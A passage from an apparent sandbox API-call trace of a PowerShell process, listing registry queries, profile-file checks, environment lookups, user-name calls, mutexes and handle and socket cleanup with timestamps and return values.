lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed8f8 | out: phkResult=0xed8f8*=0x3a8) returned 0x0 [0087.357] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed87c, lpData=0x0, lpcbData=0xed878*=0x0 | out: lpType=0xed87c*=0x1, lpData=0x0, lpcbData=0xed878*=0x56) returned 0x0 [0087.357] CoTaskMemAlloc (cb=0x5a) returned 0x1c6df0 [0087.357] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed84c, lpData=0x1c6df0, lpcbData=0xed848*=0x56 | out: lpType=0xed84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed848*=0x56) returned 0x0 [0087.357] CoTaskMemFree (pv=0x1c6df0) [0087.357] RegCloseKey (hKey=0x3a8) returned 0x0 [0087.357] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xed8f8 | out: phkResult=0xed8f8*=0x3a8) returned 0x0 [0087.357] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed87c, lpData=0x0, lpcbData=0xed878*=0x0 | out: lpType=0xed87c*=0x1, lpData=0x0, lpcbData=0xed878*=0x56) returned 0x0 [0087.357] CoTaskMemAlloc (cb=0x5a) returned 0x1c6df0 [0087.357] RegQueryValueExW (in: hKey=0x3a8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xed84c, lpData=0x1c6df0, lpcbData=0xed848*=0x56 | out: lpType=0xed84c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xed848*=0x56) returned 0x0 [0087.357] CoTaskMemFree (pv=0x1c6df0) [0087.357] RegCloseKey (hKey=0x3a8) returned 0x0 [0087.358] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b285190 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0087.358] CoTaskMemFree (pv=0x1b285190) [0087.358] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0087.358] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b285190 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0 [0087.358] CoTaskMemFree (pv=0x1b285190) [0087.358] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0xed4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b [0087.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0087.360] SetErrorMode (uMode=0x1) returned 0x1 [0087.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed860 | out: lpFileInformation=0xed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0087.360] SetErrorMode (uMode=0x1) returned 0x1 [0087.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed650, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0087.360] SetErrorMode (uMode=0x1) returned 0x1 [0087.360] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed860 | out: lpFileInformation=0xed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0087.360] SetErrorMode (uMode=0x1) returned 0x1 [0087.360] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xed650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x39 [0087.361] SetErrorMode (uMode=0x1) returned 0x1 [0087.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed860 | out: lpFileInformation=0xed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0087.361] SetErrorMode (uMode=0x1) returned 0x1 [0087.361] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xed650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4e [0087.361] SetErrorMode (uMode=0x1) returned 0x1 [0087.361] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\aetadzjz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0xed860 | out: lpFileInformation=0xed860*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0087.361] SetErrorMode (uMode=0x1) returned 0x1 [0087.362] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.362] CoTaskMemFree (pv=0x1f7a70) [0087.373] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.373] CoTaskMemFree (pv=0x1f7a70) [0087.374] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.374] CoTaskMemFree (pv=0x1f7a70) [0087.374] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.374] CoTaskMemFree (pv=0x1f7a70) [0087.379] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.379] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.379] CoTaskMemFree (pv=0x1f7a70) [0087.381] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.381] CoTaskMemFree (pv=0x1f7a70) [0087.382] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0087.382] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xeda40 | out: lpMode=0xeda40) returned 1 [0087.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.384] SetEvent (hEvent=0x398) returned 1 [0087.384] SetEvent (hEvent=0x3a8) returned 1 [0087.385] SetEvent (hEvent=0x374) returned 1 [0087.385] SetEvent (hEvent=0x394) returned 1 [0087.386] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.386] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xed798 | out: phkResult=0xed798*=0x39c) returned 0x0 [0087.386] RegQueryValueExW (in: hKey=0x39c, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xed71c, lpData=0x0, lpcbData=0xed718*=0x0 | out: lpType=0xed71c*=0x0, lpData=0x0, lpcbData=0xed718*=0x0) returned 0x2 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e8 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3ec [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x40c [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x36c [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x464 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a8 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6ac [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6b0 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6b4 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b8 [0096.970] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6bc [0096.970] SetEvent (hEvent=0x40c) returned 1 [0096.970] SetEvent (hEvent=0x3e8) returned 1 [0096.970] SetEvent (hEvent=0x3ec) returned 1 [0096.971] SetEvent (hEvent=0x3f4) returned 1 [0096.971] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c0 [0096.971] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xed828 | out: phkResult=0xed828*=0x6c4) returned 0x0 [0096.971] RegQueryValueExW (in: hKey=0x6c4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xed7ac, lpData=0x0, lpcbData=0xed7a8*=0x0 | out: lpType=0xed7ac*=0x0, lpData=0x0, lpcbData=0xed7a8*=0x0) returned 0x2 [0096.984] SetEvent (hEvent=0x36c) returned 1 [0096.984] SetEvent (hEvent=0x464) returned 1 [0096.984] SetEvent (hEvent=0x6a8) returned 1 [0097.039] CoTaskMemAlloc (cb=0x104) returned 0x1b2e3da0 [0097.039] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b2e3da0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0097.039] CoTaskMemFree (pv=0x1b2e3da0) [0097.060] SetEvent (hEvent=0x320) returned 1 [0097.061] CoTaskMemAlloc (cb=0x804) returned 0x1b3484c0 [0097.061] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3484c0, nSize=0xed8c8 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0xed8c8) returned 0x1 [0097.061] CoTaskMemFree (pv=0x1b3484c0) [0097.061] CoTaskMemAlloc (cb=0x204) returned 0x1d0ea0 [0097.061] GetUserNameW (in: lpBuffer=0x1d0ea0, pcbBuffer=0xed908 | out: lpBuffer="aETAdzjz", pcbBuffer=0xed908) returned 1 [0097.062] CoTaskMemFree (pv=0x1d0ea0) [0097.063] ReportEventW (hEventLog=0x1b840008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ef3f78*="Stopped", lpRawData=0x2ef3d08) returned 1 [0097.064] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0097.066] CoGetContextToken (in: pToken=0xef490 | out: pToken=0xef490) returned 0x0 [0097.066] CObjectContext::QueryInterface () returned 0x0 [0097.066] CObjectContext::GetCurrentThreadType () returned 0x0 [0097.066] Release () returned 0x0 [0097.067] CoGetContextToken (in: pToken=0xef060 | out: pToken=0xef060) returned 0x0 [0097.067] CObjectContext::QueryInterface () returned 0x0 [0097.067] CObjectContext::GetCurrentThreadType () returned 0x0 [0097.067] Release () returned 0x0 [0097.068] CoGetContextToken (in: pToken=0xef060 | out: pToken=0xef060) returned 0x0 [0097.068] CObjectContext::QueryInterface () returned 0x0 [0097.068] CObjectContext::GetCurrentThreadType () returned 0x0 [0097.068] Release () returned 0x0 [0097.153] CoGetContextToken (in: pToken=0xef060 | out: pToken=0xef060) returned 0x0 [0097.153] CObjectContext::QueryInterface () returned 0x0 [0097.153] CObjectContext::GetCurrentThreadType () returned 0x0 [0097.153] Release () returned 0x0 [0097.184] CoGetContextToken (in: pToken=0xef050 | out: pToken=0xef050) returned 0x0 [0097.184] CObjectContext::QueryInterface () returned 0x0 [0097.185] CObjectContext::GetCurrentThreadType () returned 0x0 [0097.185] Release () returned 0x0 [0097.185] CoUninitialize () Thread: id = 92 os_tid = 0xb4c Thread: id = 93 os_tid = 0xb50 Thread: id = 94 os_tid = 0xb58 Thread: id = 96 os_tid = 0xb6c Thread: id = 97 os_tid = 0xb70 [0078.167] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0084.306] LocalFree (hMem=0x1993b0) returned 0x0 [0084.306] CloseHandle (hObject=0x324) returned 1 [0084.306] CloseHandle (hObject=0x13) returned 1 [0084.307] CloseHandle (hObject=0xf) returned 1 [0084.307] RegCloseKey (hKey=0x310) returned 0x0 [0084.307] RegCloseKey (hKey=0x30c) returned 0x0 [0084.308] RegCloseKey (hKey=0x308) returned 0x0 [0084.308] LocalFree (hMem=0x199380) returned 0x0 [0084.308] RegCloseKey (hKey=0x330) returned 0x0 [0085.421] RegCloseKey (hKey=0x308) returned 0x0 [0087.173] RegCloseKey (hKey=0x38c) returned 0x0 [0087.173] RegCloseKey (hKey=0x388) returned 0x0 [0087.173] RegCloseKey (hKey=0x384) returned 0x0 [0087.173] RegCloseKey (hKey=0x380) returned 0x0 [0087.174] RegCloseKey (hKey=0x37c) returned 0x0 [0087.174] RegCloseKey (hKey=0x378) returned 0x0 [0087.174] RegCloseKey (hKey=0x354) returned 0x0 [0087.174] RegCloseKey (hKey=0x3a4) returned 0x0 [0087.175] RegCloseKey (hKey=0x370) returned 0x0 [0087.176] RegCloseKey (hKey=0x36c) returned 0x0 [0087.176] RegCloseKey (hKey=0x368) returned 0x0 [0087.176] RegCloseKey (hKey=0x364) returned 0x0 [0087.177] RegCloseKey (hKey=0x360) returned 0x0 [0087.177] RegCloseKey (hKey=0x35c) returned 0x0 [0087.177] RegCloseKey (hKey=0x358) returned 0x0 [0087.177] RegCloseKey (hKey=0x3a0) returned 0x0 [0087.177] RegCloseKey (hKey=0x39c) returned 0x0 [0087.178] RegCloseKey (hKey=0x348) returned 0x0 [0087.178] RegCloseKey (hKey=0x344) returned 0x0 [0087.178] RegCloseKey (hKey=0x340) returned 0x0 [0087.179] RegCloseKey (hKey=0x33c) returned 0x0 [0087.179] RegCloseKey (hKey=0x338) returned 0x0 [0087.179] RegCloseKey (hKey=0x334) returned 0x0 [0087.179] RegCloseKey (hKey=0x324) returned 0x0 [0087.179] RegCloseKey (hKey=0x30c) returned 0x0 [0087.180] RegCloseKey (hKey=0x308) returned 0x0 [0087.180] RegCloseKey (hKey=0x398) returned 0x0 [0087.180] RegCloseKey (hKey=0x394) returned 0x0 [0087.180] RegCloseKey (hKey=0x374) returned 0x0 [0087.181] RegCloseKey (hKey=0x3a8) returned 0x0 [0094.278] CloseHandle (hObject=0x410) returned 1 [0094.279] CloseHandle (hObject=0x4d4) returned 1 [0094.279] CloseHandle (hObject=0x468) returned 1 [0094.279] CloseHandle (hObject=0x3c0) returned 1 [0094.279] CloseHandle (hObject=0x3bc) returned 1 [0094.279] CloseHandle (hObject=0x3b8) returned 1 [0094.280] CloseHandle (hObject=0x3b4) returned 1 [0094.280] CloseHandle (hObject=0x3b0) returned 1 [0094.280] CloseHandle (hObject=0x4dc) returned 1 [0094.280] CloseHandle (hObject=0x380) returned 1 [0094.281] CloseHandle (hObject=0x37c) returned 1 [0094.281] CloseHandle (hObject=0x464) returned 1 [0094.281] CloseHandle (hObject=0x378) returned 1 [0094.281] CloseHandle (hObject=0x354) returned 1 [0094.282] CloseHandle (hObject=0x3a4) returned 1 [0094.282] CloseHandle (hObject=0x36c) returned 1 [0094.282] CloseHandle (hObject=0x370) returned 1 [0094.283] CloseHandle (hObject=0x368) returned 1 [0094.283] RegCloseKey (hKey=0x39c) returned 0x0 [0094.283] CloseHandle (hObject=0x414) returned 1 [0097.139] LocalFree (hMem=0x1f7960) returned 0x0 [0097.139] LocalFree (hMem=0x1f7850) returned 0x0 [0097.140] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ef4330, cbSid=0x1b49f190 | out: pSid=0x2ef4330*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b49f190) returned 1 [0097.141] CreateMutexW (lpMutexAttributes=0x2ef44e8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6e0 [0097.141] WaitForSingleObject (hHandle=0x6e0, dwMilliseconds=0x1f4) returned 0x0 [0097.141] ReleaseMutex (hMutex=0x6e0) returned 1 [0097.141] CloseHandle (hObject=0x6e0) returned 1 [0097.141] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ef4840, cbSid=0x1b49f190 | out: pSid=0x2ef4840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b49f190) returned 1 [0097.141] CreateMutexW (lpMutexAttributes=0x2ef49f8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6e0 [0097.141] WaitForSingleObject (hHandle=0x6e0, dwMilliseconds=0x1f4) returned 0x0 [0097.141] ReleaseMutex (hMutex=0x6e0) returned 1 [0097.142] CloseHandle (hObject=0x6e0) returned 1 [0097.142] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ef4d50, cbSid=0x1b49f190 | out: pSid=0x2ef4d50*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b49f190) returned 1 [0097.142] CreateMutexW (lpMutexAttributes=0x2ef4f08, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6e0 [0097.142] WaitForSingleObject (hHandle=0x6e0, dwMilliseconds=0x1f4) returned 0x0 [0097.142] ReleaseMutex (hMutex=0x6e0) returned 1 [0097.142] CloseHandle (hObject=0x6e0) returned 1 [0097.142] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ef5260, cbSid=0x1b49f190 | out: pSid=0x2ef5260*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b49f190) returned 1 [0097.142] CreateMutexW (lpMutexAttributes=0x2ef5418, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6e0 [0097.142] WaitForSingleObject (hHandle=0x6e0, dwMilliseconds=0x1f4) returned 0x0 [0097.142] ReleaseMutex (hMutex=0x6e0) returned 1 [0097.142] CloseHandle (hObject=0x6e0) returned 1 [0097.143] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ef5770, cbSid=0x1b49f1c0 | out: pSid=0x2ef5770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x1b49f1c0) returned 1 [0097.143] CreateMutexW (lpMutexAttributes=0x2ef5928, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x6e0 [0097.143] WaitForSingleObject (hHandle=0x6e0, dwMilliseconds=0x1f4) returned 0x0 [0097.143] ReleaseMutex (hMutex=0x6e0) returned 1 [0097.143] CloseHandle (hObject=0x6e0) returned 1 [0097.145] setsockopt (s=0x4f4, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0097.146] closesocket (s=0x4f4) returned 0 [0097.152] DeregisterEventSource (hEventLog=0x1b840008) returned 1 [0097.159] setsockopt (s=0x4e4, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0097.159] closesocket (s=0x4e4) returned 0 [0097.160] setsockopt (s=0x3a4, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0097.160] closesocket (s=0x3a4) returned 0 [0097.161] setsockopt (s=0x354, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0097.161] closesocket (s=0x354) returned 0 [0097.166] setsockopt (s=0x4f0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0097.166] closesocket (s=0x4f0) returned 0 [0097.167] CloseHandle (hObject=0x4d8) returned 1 [0097.167] setsockopt (s=0x4f8, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0097.167] closesocket (s=0x4f8) returned 0 [0097.167] CloseHandle (hObject=0x4fc) returned 1 [0097.167] CloseHandle (hObject=0x37c) returned 1 [0097.168] CloseHandle (hObject=0x460) returned 1 [0097.168] RegCloseKey (hKey=0x6c4) returned 0x0 [0097.168] CloseHandle (hObject=0x6c0) returned 1 [0097.168] CloseHandle (hObject=0x6bc) returned 1 [0097.169] CloseHandle (hObject=0x6b8) returned 1 [0097.169] CloseHandle (hObject=0x6b4) returned 1 [0097.169] CloseHandle (hObject=0x6b0) returned 1 [0097.169] CloseHandle (hObject=0x6ac) returned 1 [0097.170] CloseHandle (hObject=0x6a8) returned 1 [0097.170] CloseHandle (hObject=0x464) returned 1 [0097.170] CloseHandle (hObject=0x36c) returned 1 [0097.170] CloseHandle (hObject=0x40c) returned 1 [0097.170] CloseHandle (hObject=0x3f4) returned 1 [0097.171] CloseHandle (hObject=0x3ec) returned 1 [0097.171] CloseHandle (hObject=0x3e8) returned 1 [0097.171] FreeContextBuffer (in: pvContextBuffer=0x1cd0c9d0 | out: pvContextBuffer=0x1cd0c9d0) returned 0x0 [0097.172] CertFreeCRLContext (pCrlContext=0x1cd1fac0) returned 1 [0097.172] CertFreeCRLContext (pCrlContext=0x1cd1fa40) returned 1 [0097.172] CertFreeCRLContext (pCrlContext=0x1b2ae270) returned 1 [0097.173] CertCloseStore (hCertStore=0x1809e0, dwFlags=0x0) returned 1 [0097.173] CertFreeCRLContext (pCrlContext=0x1b2ae270) returned 1 [0097.173] CloseHandle (hObject=0x45c) returned 1 [0097.174] RegCloseKey (hKey=0x458) returned 0x0 [0097.174] CertFreeCRLContext (pCrlContext=0x1b2ae2f0) returned 1 [0097.174] CloseHandle (hObject=0x454) returned 1 [0097.175] CloseHandle (hObject=0x348) returned 1 [0097.175] RegCloseKey (hKey=0x450) returned 0x0 [0097.175] CloseHandle (hObject=0x344) returned 1 [0097.175] CloseHandle (hObject=0x340) returned 1 [0097.176] CloseHandle (hObject=0x33c) returned 1 [0097.176] CloseHandle (hObject=0x338) returned 1 [0097.176] CloseHandle (hObject=0x334) returned 1 [0097.176] CloseHandle (hObject=0x324) returned 1 [0097.176] CloseHandle (hObject=0x30c) returned 1 [0097.177] CloseHandle (hObject=0x308) returned 1 [0097.177] CloseHandle (hObject=0x398) returned 1 [0097.177] CloseHandle (hObject=0x394) returned 1 [0097.177] CloseHandle (hObject=0x374) returned 1 [0097.177] CloseHandle (hObject=0x3a8) returned 1 [0097.178] CloseHandle (hObject=0x44c) returned 1 [0097.178] CertFreeCRLContext (pCrlContext=0x1b2ae370) returned 1 [0097.179] RegCloseKey (hKey=0x448) returned 0x0 [0097.179] RegCloseKey (hKey=0x444) returned 0x0 [0097.179] CloseHandle (hObject=0x42c) returned 1 [0097.179] UnmapViewOfFile (lpBaseAddress=0x1bc50000) returned 1 [0097.180] CloseHandle (hObject=0x41c) returned 1 [0097.180] setsockopt (s=0x424, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0097.180] closesocket (s=0x424) returned 0 [0097.180] CloseHandle (hObject=0x428) returned 1 [0097.181] setsockopt (s=0x418, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0097.181] closesocket (s=0x418) returned 0 [0097.181] CloseHandle (hObject=0x420) returned 1 [0097.181] CloseHandle (hObject=0x32c) returned 1 [0097.182] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0097.182] FreeCredentialsHandle (phCredential=0x1b49ef20) returned 0x0 [0097.182] CloseHandle (hObject=0x2f0) returned 1 [0097.183] CloseHandle (hObject=0x320) returned 1 [0097.183] UnmapViewOfFile (lpBaseAddress=0x2910000) returned 1 Thread: id = 100 os_tid = 0xb90 [0087.391] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0087.394] SetThreadUILanguage (LangId=0x0) returned 0x7fffff00409 [0087.399] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.399] CoTaskMemFree (pv=0x1f7a70) [0087.401] VirtualQuery (in: lpAddress=0x1c6edce0, lpBuffer=0x1c6eeba0, dwLength=0x30 | out: lpBuffer=0x1c6eeba0*(BaseAddress=0x1c6ed000, AllocationBase=0x1bd60000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0087.415] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.415] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.415] CoTaskMemFree (pv=0x1f7a70) [0087.417] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.417] CoTaskMemFree (pv=0x1f7a70) [0087.419] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.420] CoTaskMemFree (pv=0x1f7a70) [0087.435] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.435] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.435] CoTaskMemFree (pv=0x1f7a70) [0087.437] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.437] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7a70, nSize=0x80 | out: lpBuffer="") returned 0x0 [0087.438] CoTaskMemFree (pv=0x1f7a70) [0087.439] CoTaskMemAlloc (cb=0x104) returned 0x1f7a70 [0087.439] GetEnvironmentVariableW 